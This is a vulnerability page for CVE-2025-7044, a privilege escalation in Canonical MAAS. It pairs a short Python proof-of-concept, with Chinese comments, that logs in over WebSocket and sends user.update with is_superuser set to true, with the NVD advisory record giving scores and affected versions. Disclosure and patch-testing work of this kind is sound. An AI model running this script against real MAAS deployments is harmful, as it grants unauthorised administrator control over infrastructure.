CVE-2025-7044

#!/usr/bin/env python3 import websocket import json # 连接到MAAS WebSocket ws = websocket.create_connection("wss://target-maas/rpc/") # 认证请求 auth_request = { "method": "login", "params": { "email": "[email protected]", "password": "password123" } } ws.send(json.dumps(auth_request)) # 权限提升请求 privilege_escalation = { "method": "user.update", "params": { "email": "[email protected]", "is_superuser": true } } ws.send(json.dumps(privilege_escalation)) # 验证权限 result = json.loads(ws.recv()) print(f"权限提升成功: {result}") ws.close()

{"cve": {"id": "CVE-2025-7044", "sourceIdentifier": "[email protected]", "published": "2025-12-03T16:16:00.450", "lastModified": "2025-12-18T21:01:26.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Input Validation vulnerability exists in the user websocket handler of MAAS. An authenticated, unprivileged attacker can intercept a user.update websocket request and inject the is_superuser property set to true. The server improperly validates this input, allowing the attacker to self-promote to an administrator role. This results in full administrative control over the MAAS deployment."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:canonical:maas:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.3.11", "matchCriteriaId": "4998723E-E15A-418C-96D6-411C2D337136"}, {"vulnerable": true, "criteria": "cpe:2.3:a:canonical:maas:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.9", "matchCriteriaId": "D81D2C91-04DD-46DB-9BB5-D4092FAB7957"}, {"vulnerable": true, "criteria": "cpe:2.3:a:canonical:maas:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.0", "versionEndExcluding": "3.5.9", "matchCriteriaId": "02799C47-8A68-40C9-9061-F877F82CA4BA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:canonical:maas:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6.0", "versionEndExcluding": "3.6.2", "matchCriteriaId": "FE9600AC-800F-49C3-8C8E-916FBD815E17"}]}]}], "references": [{"url": "https://bugs.launchpad.net/maas/+bug/2115714", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}